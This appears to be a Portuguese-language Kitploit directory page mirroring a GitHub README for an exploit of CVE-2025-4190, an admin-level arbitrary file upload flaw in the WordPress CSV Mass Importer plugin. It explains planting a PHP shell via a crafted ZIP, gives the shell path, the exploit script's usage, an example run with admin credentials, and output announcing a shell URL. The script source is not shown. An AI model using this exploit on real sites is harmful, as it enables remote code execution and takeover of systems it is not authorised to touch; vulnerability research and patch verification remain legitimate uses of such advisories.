Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-4190
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ Upload Arbitrário de Arquivos

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4190 — CSV Mass Importer do WordPress ≤ 1.2 Upload Arbitrário de Arquivos

WordPress Plugin
CVE
Status
Author


📌 Descrição

O plugin CSV Mass Importer (≤ 1.2) para WordPress contém uma vulnerabilidade de Upload Arbitrário de Arquivos por Admin+.
Devido à validação inadequada dos arquivos enviados, usuários com altos privilégios (como administradores) podem enviar arquivos arbitrários no servidor, mesmo quando isso deveria ser restrito — por exemplo, em configurações de multisite.

Esta vulnerabilidade permite que um invasor envie shells PHP ou arquivos maliciosos, levando à execução remota de código (RCE) no servidor.

Descoberto por Nxploited (Khaled Alenazi).


🔥 Detalhes

  • Nome do Plugin: CSV Mass Importer
  • Versão Afetada: ≤ 1.2
  • Tipo de Vulnerabilidade: Admin+ Upload Arbitrário de Arquivos
  • CVE: CVE-2025-4190
  • ID WPVDB: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Pesquisador Original: Khaled Alenazi (Nxploited)
  • Site do Submissor: https://github.com/Nxploited
  • Verificado: ✅

💻 Prova de Conceito (PoC)

O plugin não verifica corretamente os arquivos enviados ao usar o recurso de importação CSV.
Um arquivo ZIP manipulado contendo um shell PHP pode ser enviado e extraído para um diretório acessível publicamente.

Exemplo de Caminho do Shell:

root@kitploit:~
<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 Uso

Script

Este repositório contém um script de exploit Python pronto: 4190.py

Menu de Ajuda

root@kitploit:~
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

Exemplo de Execução

root@kitploit:~
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

Saída Esperada

root@kitploit:~
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 Linha do Tempo

  • Publicado Publicamente: 2025-04-26 (cerca de 11 dias atrás)
  • Adicionado ao Banco de Dados: 2025-05-07 (cerca de 1 hora atrás)
  • Última Atualização: 2025-05-07 (cerca de 1 hora atrás)

🛡 Referências

  • CVE-2025-4190 no WPScan

⚠ Aviso Legal

Este código é fornecido apenas para fins educacionais.
O autor não é responsável por qualquer uso indevido ou dano causado por este script.
Use com responsabilidade e apenas em sistemas que você está autorizado a testar.


Descoberto e desenvolvido por Khaled Alenazi (Nxploited) 🌟

Baixar ferramenta